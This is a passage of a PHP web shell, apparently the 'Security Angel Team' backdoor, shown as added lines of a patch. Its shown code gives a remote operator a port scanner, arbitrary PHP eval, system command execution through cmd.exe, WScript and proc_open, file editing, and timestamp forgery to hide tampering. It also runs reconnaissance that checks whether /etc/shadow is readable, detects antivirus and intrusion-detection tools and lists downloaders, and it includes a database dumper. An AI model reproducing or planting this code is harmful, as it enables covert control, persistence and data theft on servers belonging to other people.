'); + formfoot(); +}//end + +elseif ($action == 'portscan') { + !$scanip && $scanip = '127.0.0.1'; + !$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958'; + formhead(array('title'=>'Port Scan')); + makehide('action','portscan'); + p('

'); + p('IP:'); + makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip)); + p('Port:'); + makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport)); + makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt')); + p('

'); + formfoot(); + + if ($startscan) { + p('

Result »

'); + p(''); + } +} + +elseif ($action == 'eval') { + $phpcode = trim($phpcode); + if($phpcode){ + if (!preg_match('#<\?#si', $phpcode)) { + $phpcode = ""; + } + eval("?".">$phpcode'Eval PHP Code')); + makehide('action','eval'); + maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode)); + p('

Get plugins

'); + formfooter(); +}//end eval + +elseif ($action == 'editfile') { + if(file_exists($opfile)) { + $fp=@fopen($opfile,'r'); + $contents=@fread($fp, filesize($opfile)); + @fclose($fp); + $contents=htmlspecialchars($contents); + } + formhead(array('title'=>'Create / Edit File')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1)); + maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents)); + formfooter(); + + goback(); + +}//end editfile + +elseif ($action == 'newtime') { + $opfilemtime = @filemtime($opfile); + //$time = strtotime("$year-$month-$day $hour:$minute:$second"); + $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); + formhead(array('title'=>'Clone folder/file was last modified time')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); + makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1)); + formfooter(); + formhead(array('title'=>'Set last modified')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); + p('

year:'); + makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4)); + p('month:'); + makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2)); + p('day:'); + makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2)); + p('hour:'); + makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2)); + p('minute:'); + makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2)); + p('second:'); + makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2)); + p('

'); + formfooter(); + goback(); +}//end newtime + +elseif ($action == 'shell') { + if (IS_WIN && IS_COM) { + if($program && $parameter) { + $shell= new COM('Shell.Application'); + $a = $shell->ShellExecute($program,$parameter); + m('Program run has '.(!$a ? 'success' : 'fail')); + } + !$program && $program = 'c:\windows\system32\cmd.exe'; + !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt'; + formhead(array('title'=>'Execute Program')); + makehide('action','shell'); + makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1)); + p('

'); + makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter)); + makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); + p('

'); + formfoot(); + } + formhead(array('title'=>'Execute Command')); + makehide('action','shell'); + if (IS_WIN && IS_COM) { + $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open'); + makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1)); + } + p('

'); + makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command))); + makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); + p('

'); + formfoot(); + + if ($command) { + p('
');
+		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
+			$wsh = new COM('WScript.shell');
+			$exec = $wsh->exec('cmd.exe /c '.$command);
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
+			$descriptorspec = array(
+			   0 => array('pipe', 'r'),
+			   1 => array('pipe', 'w'),
+			   2 => array('pipe', 'w')
+			);
+			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
+			if (is_resource($process)) {
+				fwrite($pipes[0], $command."\r\n");
+				fwrite($pipes[0], "exit\r\n");
+				fclose($pipes[0]);
+				while (!feof($pipes[1])) {
+					echo fgets($pipes[1], 1024);
+				}
+				fclose($pipes[1]);
+				while (!feof($pipes[2])) {
+					echo fgets($pipes[2], 1024);
+				}
+				fclose($pipes[2]);
+				proc_close($process);
+			}
+		} else {
+			echo(execute($command));
+		}
+		p('
'); + } +}//end shell + +elseif ($action == 'phpenv') { + $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; + $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); + !$dis_func && $dis_func = 'No'; + $info = array( + 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), + 2 => array('Server Domain',$_SERVER['SERVER_NAME']), + 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), + 4 => array('Server OS',PHP_OS), + 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), + 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), + 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), + 8 => array('PHP run mode',strtoupper(php_sapi_name())), + 9 => array('The file path',__FILE__), + + 10 => array('PHP Version',PHP_VERSION), + 11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')), + 12 => array('Safe Mode',getcfg('safe_mode')), + 13 => array('Administrator',$adminmail), + 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), + 15 => array('enable_dl',getcfg('enable_dl')), + 16 => array('display_errors',getcfg('display_errors')), + 17 => array('register_globals',getcfg('register_globals')), + 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), + 19 => array('memory_limit',getcfg('memory_limit')), + 20 => array('post_max_size',getcfg('post_max_size')), + 21 => array('upload_max_filesize',$upsize), + 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), + 23 => array('disable_functions',$dis_func), + ); + + if($phpvarname) { + m($phpvarname .' : '.getcfg($phpvarname)); + } + + formhead(array('title'=>'Server environment')); + makehide('action','phpenv'); + makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1)); + formfooter(); + + $hp = array(0=> 'Server', 1=> 'PHP'); + for($a=0;$a<2;$a++) { + p('

'.$hp[$a].' »

'); + p(''); + } +}//end phpenv + +elseif ($action == 'secinfo') { + + secparam('Server software', @getenv('SERVER_SOFTWARE')); + secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); + secparam('Open base dir', @ini_get('open_basedir')); + secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); + secparam('Safe mode include dir', @ini_get('safe_mode_include_dir')); + secparam('cURL support', function_exists('curl_version')?'enabled':'no'); + $temp=array(); + if(function_exists('mysql_get_client_info')) + $temp[] = "MySql (".mysql_get_client_info().")"; + if(function_exists('mssql_connect')) + $temp[] = "MSSQL"; + if(function_exists('pg_connect')) + $temp[] = "PostgreSQL"; + if(function_exists('oci_connect')) + $temp[] = "Oracle"; + secparam('Supported databases', implode(', ', $temp)); + + if( !IS_WIN ) { + $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); + $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); + $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); + secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no'); + secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no'); + secparam('OS version', @file_get_contents('/proc/version')); + secparam('Distr name', @file_get_contents('/etc/issue.net')); + $safe_mode = @ini_get('safe_mode'); + if(!$GLOBALS['safe_mode']) { + $temp=array(); + foreach ($userful as $item) + if(which($item)){$temp[]=$item;} + secparam('Userful', implode(', ',$temp)); + $temp=array(); + foreach ($danger as $item) + if(which($item)){$temp[]=$item;} + secparam('Danger', implode(', ',$temp)); + $temp=array(); + foreach ($downloaders as $item) + if(which($item)){$temp[]=$item;} + secparam('Downloaders', implode(', ',$temp)); + secparam('Hosts', @file_get_contents('/etc/hosts')); + secparam('HDD space', execute('df -h')); + secparam('Mount options', @file_get_contents('/etc/fstab')); + } + } else { + secparam('OS Version',execute('ver')); + secparam('Account Settings',execute('net accounts')); + secparam('User Accounts',execute('net user')); + secparam('IP Configurate',execute('ipconfig -all')); + } +}//end + +else { + m('Undefined Action'); +} + +?> + +
+ + Powered by 2011. Copyright (C) 2004-2011 Security Angel Team [S4T] All Rights Reserved. +
+ + + +'.$n.' »'); + p('
'); + if(strpos($v, "\n") === false) + p($v.'
'); + else + p('
'.$v.'
'); + p('
'); + } +} +function m($msg) { + echo '
'; + echo $msg; + echo '
'; +} +function scookie($key, $value, $life = 0, $prefix = 1) { + global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife; + $key = ($prefix ? $cookiepre : '').$key; + $life = $life ? $life : $cookielife; + $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; + setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport); +} +function multi($num, $perpage, $curpage, $tablename) { + $multipage = ''; + if($num > $perpage) { + $page = 10; + $offset = 5; + $pages = @ceil($num / $perpage); + if($page > $pages) { + $from = 1; + $to = $pages; + } else { + $from = $curpage - $offset; + $to = $curpage + $page - $offset - 1; + if($from < 1) { + $to = $curpage + 1 - $from; + $from = 1; + if(($to - $from) < $page && ($to - $from) < $pages) { + $to = $page; + } + } elseif($to > $pages) { + $from = $curpage - $pages + $to; + $to = $pages; + if(($to - $from) < $page && ($to - $from) < $pages) { + $from = $pages - $page + 1; + } + } + } + $multipage = ($curpage - $offset > 1 && $pages > $page ? 'First ' : '').($curpage > 1 ? 'Prev ' : ''); + for($i = $from; $i <= $to; $i++) { + $multipage .= $i == $curpage ? $i.' ' : '['.$i.'] '; + } + $multipage .= ($curpage < $pages ? 'Next' : '').($to < $pages ? ' Last' : ''); + $multipage = $multipage ? '

Pages: '.$multipage.'

' : ''; + } + return $multipage; +} +// µÇ½Èë¿Ú +function loginpage() { +?> + + + Password: + + + +Can not connect to MySQL server'); + exit; + } + if($link && $dbname) { + if (!@mysql_select_db($dbname, $link)) { + p('

Database selected has error

'); + exit; + } + } + if($link && mysql_get_server_info() > '4.1') { + if($charset && in_array(strtolower($charset), $charsetdb)) { + q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link); + } + } + return $link; +} + +// È¥µôתÒå×Ö·û +function s_array(&$array) { + if (is_array($array)) { + foreach ($array as $k => $v) { + $array[$k] = s_array($v); + } + } else if (is_string($array)) { + $array = stripslashes($array); + } + return $array; +} + +// Çå³ýHTML´úÂë +function html_clean($content) { + $content = htmlspecialchars($content); + $content = str_replace("\n", "
", $content); + $content = str_replace(" ", "  ", $content); + $content = str_replace("\t", "    ", $content); + return $content; +} + +// »ñȡȨÏÞ +function getChmod($filepath){ + return substr(base_convert(@fileperms($filepath),10,8),-4); +} + +function getPerms($filepath) { + $mode = @fileperms($filepath); + if (($mode & 0xC000) === 0xC000) {$type = 's';} + elseif (($mode & 0x4000) === 0x4000) {$type = 'd';} + elseif (($mode & 0xA000) === 0xA000) {$type = 'l';} + elseif (($mode & 0x8000) === 0x8000) {$type = '-';} + elseif (($mode & 0x6000) === 0x6000) {$type = 'b';} + elseif (($mode & 0x2000) === 0x2000) {$type = 'c';} + elseif (($mode & 0x1000) === 0x1000) {$type = 'p';} + else {$type = '?';} + + $owner['read'] = ($mode & 00400) ? 'r' : '-'; + $owner['write'] = ($mode & 00200) ? 'w' : '-'; + $owner['execute'] = ($mode & 00100) ? 'x' : '-'; + $group['read'] = ($mode & 00040) ? 'r' : '-'; + $group['write'] = ($mode & 00020) ? 'w' : '-'; + $group['execute'] = ($mode & 00010) ? 'x' : '-'; + $world['read'] = ($mode & 00004) ? 'r' : '-'; + $world['write'] = ($mode & 00002) ? 'w' : '-'; + $world['execute'] = ($mode & 00001) ? 'x' : '-'; + + if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';} + if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';} + if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';} + + return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute']; +} + +function getUser($filepath) { + if (function_exists('posix_getpwuid')) { + $array = @posix_getpwuid(@fileowner($filepath)); + if ($array && is_array($array)) { + return ' / '.$array['name'].''; + } + } + return ''; +} + +// ɾ³ýĿ¼ +function deltree($deldir) { + $mydir=@dir($deldir); + while($file=$mydir->read()) { + if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { + @chmod($deldir.'/'.$file,0777); + deltree($deldir.'/'.$file); + } + if (is_file($deldir.'/'.$file)) { + @chmod($deldir.'/'.$file,0777); + @unlink($deldir.'/'.$file); + } + } + $mydir->close(); + @chmod($deldir,0777); + return @rmdir($deldir) ? 1 : 0; +} + +// ±í¸ñÐмäµÄ±³¾°É«Ìæ»» +function bg() { + global $bgc; + return ($bgc++%2==0) ? 'alt1' : 'alt2'; +} + +// »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶ +function getPath($scriptpath, $nowpath) { + if ($nowpath == '.') { + $nowpath = $scriptpath; + } + $nowpath = str_replace('\\', '/', $nowpath); + $nowpath = str_replace('//', '/', $nowpath); + if (substr($nowpath, -1) != '/') { + $nowpath = $nowpath.'/'; + } + return $nowpath; +} + +// »ñÈ¡µ±Ç°Ä¿Â¼µÄÉϼ¶Ä¿Â¼ +function getUpPath($nowpath) { + $pathdb = explode('/', $nowpath); + $num = count($pathdb); + if ($num > 2) { + unset($pathdb[$num-1],$pathdb[$num-2]); + } + $uppath = implode('/', $pathdb).'/'; + $uppath = str_replace('//', '/', $uppath); + return $uppath; +} + +// ¼ì²éPHPÅäÖòÎÊý +function getcfg($varname) { + $result = get_cfg_var($varname); + if ($result == 0) { + return 'No'; + } elseif ($result == 1) { + return 'Yes'; + } else { + return $result; + } +} + +// ¼ì²éº¯ÊýÇé¿ö +function getfun($funName) { + return (false !== function_exists($funName)) ? 'Yes' : 'No'; +} + +// »ñµÃÎļþÀ©Õ¹Ãû +function getext($file) { + $info = pathinfo($file); + return $info['extension']; +} + +function GetWDirList($dir){ + global $dirdata,$j,$nowpath; + !$j && $j=1; + if ($dh = opendir($dir)) { + while ($file = readdir($dh)) { + $f=str_replace('//','/',$dir.'/'.$file); + if($file!='.' && $file!='..' && is_dir($f)){ + if (is_writable($f)) { + $dirdata[$j]['filename']=str_replace($nowpath,'',$f); + $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); + $dirdata[$j]['dirchmod']=getChmod($f); + $dirdata[$j]['dirperm']=getPerms($f); + $dirdata[$j]['dirlink']=$dir; + $dirdata[$j]['server_link']=$f; + $j++; + } + GetWDirList($f); + } + } + closedir($dh); + clearstatcache(); + return $dirdata; + } else { + return array(); + } +} + +function GetWFileList($dir){ + global $filedata,$j,$nowpath, $writabledb; + !$j && $j=1; + if ($dh = opendir($dir)) { + while ($file = readdir($dh)) { + $ext = getext($file); + $f=str_replace('//','/',$dir.'/'.$file); + if($file!='.' && $file!='..' && is_dir($f)){ + GetWFileList($f); + } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){ + if (is_writable($f)) { + $filedata[$j]['filename']=str_replace($nowpath,'',$f); + $filedata[$j]['size']=sizecount(@filesize($f)); + $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); + $filedata[$j]['filechmod']=getChmod($f); + $filedata[$j]['fileperm']=getPerms($f); + $filedata[$j]['fileowner']=getUser($f); + $filedata[$j]['dirlink']=$dir; + $filedata[$j]['server_link']=$f; + $j++; + } + } + } + closedir($dh); + clearstatcache(); + return $filedata; + } else { + return array(); + } +} + +function GetSFileList($dir, $content, $re = 0) { + global $filedata,$j,$nowpath, $writabledb; + !$j && $j=1; + if ($dh = opendir($dir)) { + while ($file = readdir($dh)) { + $ext = getext($file); + $f=str_replace('//','/',$dir.'/'.$file); + if($file!='.' && $file!='..' && is_dir($f)){ + GetSFileList($f, $content, $re = 0); + } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){ + $find = 0; + if ($re) { + if ( preg_match('@'.$content.'@',$file) || preg_match('@'.$content.'@', @file_get_contents($f)) ){ + $find = 1; + } + } else { + if ( strstr($file, $content) || strstr( @file_get_contents($f),$content ) ) { + $find = 1; + } + } + if ($find) { + $filedata[$j]['filename']=str_replace($nowpath,'',$f); + $filedata[$j]['size']=sizecount(@filesize($f)); + $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); + $filedata[$j]['filechmod']=getChmod($f); + $filedata[$j]['fileperm']=getPerms($f); + $filedata[$j]['fileowner']=getUser($f); + $filedata[$j]['dirlink']=$dir; + $filedata[$j]['server_link']=$f; + $j++; + } + } + } + closedir($dh); + clearstatcache(); + return $filedata; + } else { + return array(); + } +} + +function qy($sql) { + global $mysqllink; + //echo $sql.'
'; + $res = $error = ''; + if(!$res = @mysql_query($sql,$mysqllink)) { + return 0; + } else if(is_resource($res)) { + return 1; + } else { + return 2; + } + return 0; +} + +function q($sql) { + global $mysqllink; + return @mysql_query($sql,$mysqllink); +} + +function fr($qy){ + mysql_free_result($qy); +} + +function sizecount($fileSize) { + $size = sprintf("%u", $fileSize); + if($size == 0) { + return '0 Bytes' ; + } + $sizename = array(' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB'); + return round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i]; +} +// ±¸·ÝÊý¾Ý¿â +function sqldumptable($table, $fp=0) { + global $mysqllink; + + $tabledump = "DROP TABLE IF EXISTS `$table`;\n"; + $res = q("SHOW CREATE TABLE $table"); + $create = mysql_fetch_row($res); + $tabledump .= $create[1].";\n\n"; + + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + $tabledump = ''; + $rows = q("SELECT * FROM $table"); + while ($row = mysql_fetch_assoc($rows)) { + foreach($row as $k=>$v) { + $row[$k] = "'".@mysql_real_escape_string($v)."'"; + } + $tabledump = 'INSERT INTO `'.$table.'` VALUES ('.implode(", ", $row).');'."\n"; + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + } + fwrite($fp,"\n\n"); + fr($rows); +} + +function p($str){ + echo $str."\n"; +} + +function tbhead() { + p(''); +} +function tbfoot(){ + p('
'); +} + +function makehide($name,$value=''){ + p(""); +} + +function makeinput($arg = array()){ + $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\""; + $arg['extra'] = $arg['extra'] ? $arg['extra'] : ''; + !$arg['type'] && $arg['type'] = 'text'; + $arg['title'] = $arg['title'] ? $arg['title'].'
' : ''; + $arg['class'] = $arg['class'] ? $arg['class'] : 'input'; + if ($arg['newline']) { + p("

$arg[title]

"); + } else { + p("$arg[title]"); + } +} + +function makeselect($arg = array()){ + if ($arg['onchange']) { + $onchange = 'onchange="'.$arg['onchange'].'"'; + } + $arg['title'] = $arg['title'] ? $arg['title'] : ''; + if ($arg['newline']) p('

'); + p("$arg[title] "); + if ($arg['newline']) p('

'); +} +function formhead($arg = array()) { + global $self; + !$arg['method'] && $arg['method'] = 'post'; + !$arg['action'] && $arg['action'] = $self; + $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : ''; + !$arg['name'] && $arg['name'] = 'form1'; + p("
"); + if ($arg['title']) { + p('

'.$arg['title'].' »

'); + } +} + +function maketext($arg = array()){ + !$arg['cols'] && $arg['cols'] = 100; + !$arg['rows'] && $arg['rows'] = 25; + $arg['title'] = $arg['title'] ? $arg['title'].'
' : ''; + p("

$arg[title]

"); +} + +function formfooter($name = ''){ + !$name && $name = 'submit'; + p('

'); + p('
'); +} + +function goback(){ + global $self, $nowpath; + p('

'); +} + +function formfoot(){ + p(''); +} + +function encode_pass($pass) { + $pass = md5('angel'.$pass); + $pass = md5($pass.'angel'); + $pass = md5('angel'.$pass.'angel'); + return $pass; +} + +function pr($s){ + echo "
".print_r($s).'
'; +} + +?> \ No newline at end of file